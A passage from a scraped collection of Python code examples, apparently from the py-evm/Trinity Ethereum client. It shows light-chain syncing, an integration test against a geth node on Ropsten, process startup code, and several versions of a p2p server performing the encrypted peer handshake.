    if args.mainnet:
        GENESIS_HEADER = MAINNET_GENESIS_HEADER
        NETWORK_ID = MAINNET_NETWORK_ID
    DemoLightChain = LightChain.configure(
        'DemoLightChain',
        vm_configuration=MAINNET_VM_CONFIGURATION,
        network_id=NETWORK_ID,
    )

    chaindb = ChainDB(LevelDB(args.db))
    if args.local_geth:
        peer_pool = LocalGethPeerPool(LESPeer, chaindb, NETWORK_ID,
                                      ecies.generate_privkey())
    else:
        peer_pool = PeerPool(LESPeer, chaindb, NETWORK_ID,
                             ecies.generate_privkey())
    try:
        chaindb.get_canonical_head()
    except CanonicalHeadNotFound:
        # We're starting with a fresh DB.
        chain = DemoLightChain.from_genesis_header(chaindb, GENESIS_HEADER,
                                                   peer_pool)
    else:
        # We're reusing an existing db.
        chain = DemoLightChain(chaindb, peer_pool)

    asyncio.ensure_future(peer_pool.run())
    loop = asyncio.get_event_loop()

    async def run():
        # chain.run() will run in a loop until the SIGINT/SIGTERM handler triggers its cancel
        # token, at which point it returns and we stop the pool and chain.
        await chain.run()
        await peer_pool.stop()
        await chain.stop()

    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, chain.cancel_token.trigger)

    loop.run_until_complete(run())
    loop.close()
Exemplo n.º 21
0
async def test_lightchain_integration(request, event_loop):
    """Test LightChainSyncer/LightPeerChain against a running geth instance.

    In order to run this you need to pass the following to pytest:

        pytest --integration --enode=...
    """
    # TODO: Implement a pytest fixture that runs geth as above, so that we don't need to run it
    # manually.
    if not pytest.config.getoption("--integration"):
        pytest.skip("Not asked to run integration tests")

    remote = Node.from_uri(pytest.config.getoption("--enode"))
    base_db = MemoryDB()
    chaindb = FakeAsyncChainDB(base_db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    headerdb = FakeAsyncHeaderDB(base_db)
    peer_pool = PeerPool(LESPeer,
                         FakeAsyncHeaderDB(base_db), ROPSTEN_NETWORK_ID,
                         ecies.generate_privkey(), ROPSTEN_VM_CONFIGURATION)
    chain = FakeAsyncRopstenChain(base_db)
    syncer = LightChainSyncer(chain, chaindb, peer_pool)
    syncer.min_peers_to_sync = 1
    peer_chain = LightPeerChain(headerdb, peer_pool)

    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, tuple([remote])))
    asyncio.ensure_future(peer_chain.run())
    asyncio.ensure_future(syncer.run())
    await asyncio.sleep(
        0)  # Yield control to give the LightChainSyncer a chance to start

    def finalizer():
        event_loop.run_until_complete(peer_pool.cancel())
        event_loop.run_until_complete(peer_chain.cancel())
        event_loop.run_until_complete(syncer.cancel())

    request.addfinalizer(finalizer)

    n = 11

    # Wait for the chain to sync a few headers.
    async def wait_for_header_sync(block_number):
        while headerdb.get_canonical_head().block_number < block_number:
            await asyncio.sleep(0.1)

    await asyncio.wait_for(wait_for_header_sync(n), 5)

    # https://ropsten.etherscan.io/block/11
    header = headerdb.get_canonical_block_header_by_number(n)
    body = await peer_chain.get_block_body_by_hash(header.hash)
    assert len(body['transactions']) == 15

    receipts = await peer_chain.get_receipts(header.hash)
    assert len(receipts) == 15
    assert encode_hex(keccak(rlp.encode(receipts[0]))) == (
        '0xf709ed2c57efc18a1675e8c740f3294c9e2cb36ba7bb3b89d3ab4c8fef9d8860')

    assert len(peer_pool) == 1
    head_info = peer_pool.peers[0].head_info
    head = await peer_chain.get_block_header_by_hash(head_info.block_hash)
    assert head.block_number == head_info.block_number

    # In order to answer queries for contract code, geth needs the state trie entry for the block
    # we specify in the query, but because of fast sync we can only assume it has that for recent
    # blocks, so we use the current head to lookup the code for the contract below.
    # https://ropsten.etherscan.io/address/0x95a48dca999c89e4e284930d9b9af973a7481287
    contract_addr = decode_hex('95a48dca999c89e4e284930d9b9af973a7481287')
    contract_code = await peer_chain.get_contract_code(head.hash,
                                                       keccak(contract_addr))
    assert encode_hex(keccak(contract_code)) == (
        '0x1e0b2ad970b365a217c40bcf3582cbb4fcc1642d7a5dd7a82ae1e278e010123e')

    account = await peer_chain.get_account(head.hash, contract_addr)
    assert account.code_hash == keccak(contract_code)
    assert account.balance == 0
Exemplo n.º 22
0
def main():
    args = parser.parse_args()

    if args.ropsten:
        chain_identifier = ROPSTEN
    else:
        # TODO: mainnet
        chain_identifier = ROPSTEN

    if args.light:
        sync_mode = SYNC_LIGHT
    else:
        # TODO: actually use args.sync_mode (--sync-mode)
        sync_mode = SYNC_LIGHT

    chain_config = ChainConfig.from_parser_args(
        chain_identifier,
        args,
    )

    # if console command, run the trinity CLI
    if args.subcommand == 'console':
        use_ipython = not args.vanilla_shell
        debug = args.log_level.upper() == 'DEBUG'

        # TODO: this should use the base `Chain` class rather than the protocol
        # class since it's just a repl with access to the chain.
        chain_class = get_chain_protocol_class(chain_config, sync_mode)
        chaindb = ChainDB(LevelDB(chain_config.database_dir))
        peer_pool = PeerPool(LESPeer, chaindb, chain_config.network_id,
                             chain_config.nodekey)

        chain = chain_class(chaindb, peer_pool)
        args.func(chain, use_ipython=use_ipython, debug=debug)
        sys.exit(0)

    logger, log_queue, listener = setup_trinity_logging(args.log_level.upper())

    # start the listener thread to handle logs produced by other processes in
    # the local logger.
    listener.start()

    # First initialize the database process.
    database_server_process = ctx.Process(target=run_database_process,
                                          args=(
                                              chain_config,
                                              LevelDB,
                                          ),
                                          kwargs={'log_queue': log_queue})

    # For now we just run the light sync against ropsten by default.
    networking_process = ctx.Process(target=run_networking_process,
                                     args=(chain_config, sync_mode),
                                     kwargs={'log_queue': log_queue})

    # start the processes
    database_server_process.start()
    wait_for_ipc(chain_config.database_ipc_path)

    networking_process.start()

    try:
        networking_process.join()
    except KeyboardInterrupt:
        logger.info('Keyboard Interrupt: Stopping')
        kill_process_gracefully(networking_process)
        logger.info('KILLED networking_process')
        kill_process_gracefully(database_server_process)
        logger.info('KILLED database_server_process')
Exemplo n.º 23
0
class Server:
    """Server listening for incoming connections"""
    logger = logging.getLogger("p2p.server.Server")
    _server = None

    def __init__(self, privkey: datatypes.PrivateKey, server_address: Address,
                 chaindb: AsyncChainDB, bootstrap_nodes: List[str],
                 network_id: int) -> None:
        self.cancel_token = CancelToken('Server')
        self.chaindb = chaindb
        self.privkey = privkey
        self.server_address = server_address
        self.network_id = network_id
        # TODO: bootstrap_nodes should be looked up by network_id.
        discovery = DiscoveryProtocol(self.privkey,
                                      self.server_address,
                                      bootstrap_nodes=bootstrap_nodes)
        self.peer_pool = PeerPool(ETHPeer, self.chaindb, self.network_id,
                                  self.privkey, discovery)

    async def start(self) -> None:
        self._server = await asyncio.start_server(
            self.receive_handshake,
            host=self.server_address.ip,
            port=self.server_address.tcp_port,
        )

    async def run(self) -> None:
        await self.start()
        self.logger.info("Running server...")
        await self.cancel_token.wait()
        await self.stop()

    async def stop(self) -> None:
        self.logger.info("Closing server...")
        self.cancel_token.trigger()
        self._server.close()
        await self._server.wait_closed()
        await self.peer_pool.stop()

    async def receive_handshake(self, reader: asyncio.StreamReader,
                                writer: asyncio.StreamWriter) -> None:
        # Use reader to read the auth_init msg until EOF
        msg = await reader.read(ENCRYPTED_AUTH_MSG_LEN)

        # Use HandshakeResponder.decode_authentication(auth_init_message) on auth init msg
        try:
            ephem_pubkey, initiator_nonce, initiator_pubkey = decode_authentication(
                msg, self.privkey)
        # Try to decode as EIP8
        except DecryptionError:
            msg_size = big_endian_to_int(msg[:2])
            remaining_bytes = msg_size - ENCRYPTED_AUTH_MSG_LEN + 2
            msg += await reader.read(remaining_bytes)
            ephem_pubkey, initiator_nonce, initiator_pubkey = decode_authentication(
                msg, self.privkey)

        # Get remote's address: IPv4 or IPv6
        ip, port, *_ = writer.get_extra_info("peername")
        remote_address = Address(ip, port)

        # Create `HandshakeResponder(remote: kademlia.Node, privkey: datatypes.PrivateKey)` instance
        initiator_remote = Node(initiator_pubkey, remote_address)
        responder = HandshakeResponder(initiator_remote, self.privkey)

        # Call `HandshakeResponder.create_auth_ack_message(nonce: bytes)` to create the reply
        responder_nonce = secrets.token_bytes(HASH_LEN)
        auth_ack_msg = responder.create_auth_ack_message(nonce=responder_nonce)
        auth_ack_ciphertext = responder.encrypt_auth_ack_message(auth_ack_msg)

        # Use the `writer` to send the reply to the remote
        writer.write(auth_ack_ciphertext)
        await writer.drain()

        # Call `HandshakeResponder.derive_shared_secrets()` and use return values to create `Peer`
        aes_secret, mac_secret, egress_mac, ingress_mac = responder.derive_secrets(
            initiator_nonce=initiator_nonce,
            responder_nonce=responder_nonce,
            remote_ephemeral_pubkey=ephem_pubkey,
            auth_init_ciphertext=msg,
            auth_ack_ciphertext=auth_ack_ciphertext)

        # Create and register peer in peer_pool
        eth_peer = ETHPeer(remote=initiator_remote,
                           privkey=self.privkey,
                           reader=reader,
                           writer=writer,
                           aes_secret=aes_secret,
                           mac_secret=mac_secret,
                           egress_mac=egress_mac,
                           ingress_mac=ingress_mac,
                           chaindb=self.chaindb,
                           network_id=self.network_id)
        self.peer_pool.add_peer(eth_peer)
Exemplo n.º 24
0
def _test() -> None:
    import argparse
    import signal
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import DEFAULT_PREFERRED_NODES
    from eth.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from eth.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import (
        FakeAsyncChainDB, FakeAsyncRopstenChain, FakeAsyncHeaderDB, connect_to_peers_loop)

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-fast', action="store_true")
    parser.add_argument('-light', action="store_true")
    parser.add_argument('-enode', type=str, required=False, help="The enode we should connect to")
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    logging.basicConfig(
        level=logging.INFO, format='%(asctime)s %(levelname)s: %(message)s', datefmt='%H:%M:%S')
    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG

    loop = asyncio.get_event_loop()

    base_db = LevelDB(args.db)
    chaindb = FakeAsyncChainDB(base_db)
    chaindb.persist_header(ROPSTEN_GENESIS_HEADER)
    headerdb = FakeAsyncHeaderDB(base_db)

    peer_class: Type[HeaderRequestingPeer] = ETHPeer
    if args.light:
        peer_class = LESPeer
    network_id = RopstenChain.network_id
    privkey = ecies.generate_privkey()
    peer_pool = PeerPool(peer_class, headerdb, network_id, privkey, ROPSTEN_VM_CONFIGURATION)
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]

    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))
    chain = FakeAsyncRopstenChain(base_db)
    syncer: BaseHeaderChainSyncer = None
    if args.fast:
        syncer = FastChainSyncer(chain, chaindb, peer_pool)
    elif args.light:
        syncer = LightChainSyncer(chain, headerdb, peer_pool)
    else:
        syncer = RegularChainSyncer(chain, chaindb, peer_pool)
    syncer.logger.setLevel(log_level)
    syncer.min_peers_to_sync = 1

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        await syncer.cancel()
        loop.stop()

    async def run() -> None:
        await syncer.run()
        syncer.logger.info("run() finished, exiting")
        sigint_received.set()

    # loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(run())
    loop.run_forever()
    loop.close()
Exemplo n.º 25
0
class Server:
    """Server listening for incoming connections"""
    logger = logging.getLogger("p2p.server.Server")
    _server = None

    def __init__(
        self,
        privkey: datatypes.PrivateKey,
        server_address: Address,
        chaindb: AsyncChainDB,
        bootstrap_nodes: List[str],
        network_id: int,
        min_peers: int = DEFAULT_MIN_PEERS,
        peer_class: Type[BasePeer] = ETHPeer,
    ) -> None:
        self.cancel_token = CancelToken('Server')
        self.chaindb = chaindb
        self.privkey = privkey
        self.server_address = server_address
        self.network_id = network_id
        self.peer_class = peer_class
        # TODO: bootstrap_nodes should be looked up by network_id.
        discovery = DiscoveryProtocol(self.privkey,
                                      self.server_address,
                                      bootstrap_nodes=bootstrap_nodes)
        self.peer_pool = PeerPool(
            peer_class,
            self.chaindb,
            self.network_id,
            self.privkey,
            discovery,
            min_peers=min_peers,
        )

    async def start(self) -> None:
        self._server = await asyncio.start_server(
            self.receive_handshake,
            host=self.server_address.ip,
            port=self.server_address.tcp_port,
        )

    async def run(self) -> None:
        await self.start()
        self.logger.info("Running server...")
        self.logger.info(
            "enode://%s@%s:%s",
            self.privkey.public_key.to_hex()[2:],
            self.server_address.ip,
            self.server_address.tcp_port,
        )
        await self.cancel_token.wait()
        await self.stop()

    async def stop(self) -> None:
        self.logger.info("Closing server...")
        self.cancel_token.trigger()
        self._server.close()
        await self._server.wait_closed()
        await self.peer_pool.stop()

    async def receive_handshake(self, reader: asyncio.StreamReader,
                                writer: asyncio.StreamWriter) -> None:
        await wait_with_token(
            self._receive_handshake(reader, writer),
            token=self.cancel_token,
            timeout=HANDSHAKE_TIMEOUT,
        )

    async def _receive_handshake(self, reader: asyncio.StreamReader,
                                 writer: asyncio.StreamWriter) -> None:
        self.logger.debug("Receiving handshake...")
        # Use reader to read the auth_init msg until EOF
        msg = await wait_with_token(
            reader.read(ENCRYPTED_AUTH_MSG_LEN),
            token=self.cancel_token,
        )

        # Use decode_authentication(auth_init_message) on auth init msg
        try:
            ephem_pubkey, initiator_nonce, initiator_pubkey = decode_authentication(
                msg, self.privkey)
        # Try to decode as EIP8
        except DecryptionError:
            msg_size = big_endian_to_int(msg[:2])
            remaining_bytes = msg_size - ENCRYPTED_AUTH_MSG_LEN + 2
            msg += await wait_with_token(
                reader.read(remaining_bytes),
                token=self.cancel_token,
            )
            ephem_pubkey, initiator_nonce, initiator_pubkey = decode_authentication(
                msg, self.privkey)

        # Get remote's address: IPv4 or IPv6
        ip, socket, *_ = writer.get_extra_info("peername")
        remote_address = Address(ip, socket)

        # Create `HandshakeResponder(remote: kademlia.Node, privkey: datatypes.PrivateKey)` instance
        initiator_remote = Node(initiator_pubkey, remote_address)
        responder = HandshakeResponder(initiator_remote, self.privkey)

        # Call `HandshakeResponder.create_auth_ack_message(nonce: bytes)` to create the reply
        responder_nonce = secrets.token_bytes(HASH_LEN)
        auth_ack_msg = responder.create_auth_ack_message(nonce=responder_nonce)
        auth_ack_ciphertext = responder.encrypt_auth_ack_message(auth_ack_msg)

        # Use the `writer` to send the reply to the remote
        writer.write(auth_ack_ciphertext)
        await writer.drain()

        # Call `HandshakeResponder.derive_shared_secrets()` and use return values to create `Peer`
        aes_secret, mac_secret, egress_mac, ingress_mac = responder.derive_secrets(
            initiator_nonce=initiator_nonce,
            responder_nonce=responder_nonce,
            remote_ephemeral_pubkey=ephem_pubkey,
            auth_init_ciphertext=msg,
            auth_ack_ciphertext=auth_ack_ciphertext)

        # Create and register peer in peer_pool
        peer = self.peer_class(remote=initiator_remote,
                               privkey=self.privkey,
                               reader=reader,
                               writer=writer,
                               aes_secret=aes_secret,
                               mac_secret=mac_secret,
                               egress_mac=egress_mac,
                               ingress_mac=ingress_mac,
                               chaindb=self.chaindb,
                               network_id=self.network_id)

        await self.do_p2p_handshake(peer)

    async def do_p2p_handshake(self, peer: BasePeer) -> None:
        try:
            # P2P Handshake.
            await peer.do_p2p_handshake(),
        except (HandshakeFailure, asyncio.TimeoutError) as e:
            self.logger.debug('Unable to finish P2P handshake: %s', str(e))
        else:
            # Run peer and add peer.
            self.peer_pool.start_peer(peer)
Exemplo n.º 26
0
def _test() -> None:
    import argparse
    from pathlib import Path
    import signal
    from p2p import ecies
    from p2p.kademlia import Node
    from p2p.peer import DEFAULT_PREFERRED_NODES
    from eth.chains.ropsten import RopstenChain, ROPSTEN_GENESIS_HEADER, ROPSTEN_VM_CONFIGURATION
    from eth.chains.mainnet import MainnetChain, MAINNET_GENESIS_HEADER, MAINNET_VM_CONFIGURATION
    from eth.db.backends.level import LevelDB
    from tests.p2p.integration_test_helpers import (FakeAsyncChainDB,
                                                    FakeAsyncMainnetChain,
                                                    FakeAsyncRopstenChain,
                                                    FakeAsyncHeaderDB,
                                                    connect_to_peers_loop)
    from trinity.protocol.eth.peer import ETHPeer  # noqa: F811
    from trinity.protocol.les.peer import LESPeer  # noqa: F811
    from trinity.utils.chains import load_nodekey

    parser = argparse.ArgumentParser()
    parser.add_argument('-db', type=str, required=True)
    parser.add_argument('-fast', action="store_true")
    parser.add_argument('-light', action="store_true")
    parser.add_argument('-nodekey', type=str)
    parser.add_argument('-enode',
                        type=str,
                        required=False,
                        help="The enode we should connect to")
    parser.add_argument('-debug', action="store_true")
    args = parser.parse_args()

    logging.basicConfig(level=logging.INFO,
                        format='%(asctime)s %(levelname)s: %(message)s',
                        datefmt='%H:%M:%S')
    log_level = logging.INFO
    if args.debug:
        log_level = logging.DEBUG

    loop = asyncio.get_event_loop()

    base_db = LevelDB(args.db)
    headerdb = FakeAsyncHeaderDB(base_db)
    chaindb = FakeAsyncChainDB(base_db)
    try:
        genesis = chaindb.get_canonical_block_header_by_number(0)
    except HeaderNotFound:
        genesis = ROPSTEN_GENESIS_HEADER
        chaindb.persist_header(genesis)

    peer_class: Type[Union[ETHPeer, LESPeer]] = ETHPeer
    if args.light:
        peer_class = LESPeer

    if genesis.hash == ROPSTEN_GENESIS_HEADER.hash:
        network_id = RopstenChain.network_id
        vm_config = ROPSTEN_VM_CONFIGURATION  # type: ignore
        chain_class = FakeAsyncRopstenChain
    elif genesis.hash == MAINNET_GENESIS_HEADER.hash:
        network_id = MainnetChain.network_id
        vm_config = MAINNET_VM_CONFIGURATION  # type: ignore
        chain_class = FakeAsyncMainnetChain
    else:
        raise RuntimeError("Unknown genesis: %s", genesis)
    if args.nodekey:
        privkey = load_nodekey(Path(args.nodekey))
    else:
        privkey = ecies.generate_privkey()
    peer_pool = PeerPool(peer_class, headerdb, network_id, privkey, vm_config)
    if args.enode:
        nodes = tuple([Node.from_uri(args.enode)])
    else:
        nodes = DEFAULT_PREFERRED_NODES[network_id]

    asyncio.ensure_future(peer_pool.run())
    asyncio.ensure_future(connect_to_peers_loop(peer_pool, nodes))
    chain = chain_class(base_db)
    syncer: BaseHeaderChainSyncer = None
    if args.fast:
        syncer = FastChainSyncer(chain, chaindb, peer_pool)
    elif args.light:
        syncer = LightChainSyncer(chain, headerdb, peer_pool)
    else:
        syncer = RegularChainSyncer(chain, chaindb, peer_pool)
    syncer.logger.setLevel(log_level)
    syncer.min_peers_to_sync = 1

    sigint_received = asyncio.Event()
    for sig in [signal.SIGINT, signal.SIGTERM]:
        loop.add_signal_handler(sig, sigint_received.set)

    async def exit_on_sigint() -> None:
        await sigint_received.wait()
        await peer_pool.cancel()
        await syncer.cancel()
        loop.stop()

    async def run() -> None:
        await syncer.run()
        syncer.logger.info("run() finished, exiting")
        sigint_received.set()

    # loop.set_debug(True)
    asyncio.ensure_future(exit_on_sigint())
    asyncio.ensure_future(run())
    loop.run_forever()
    loop.close()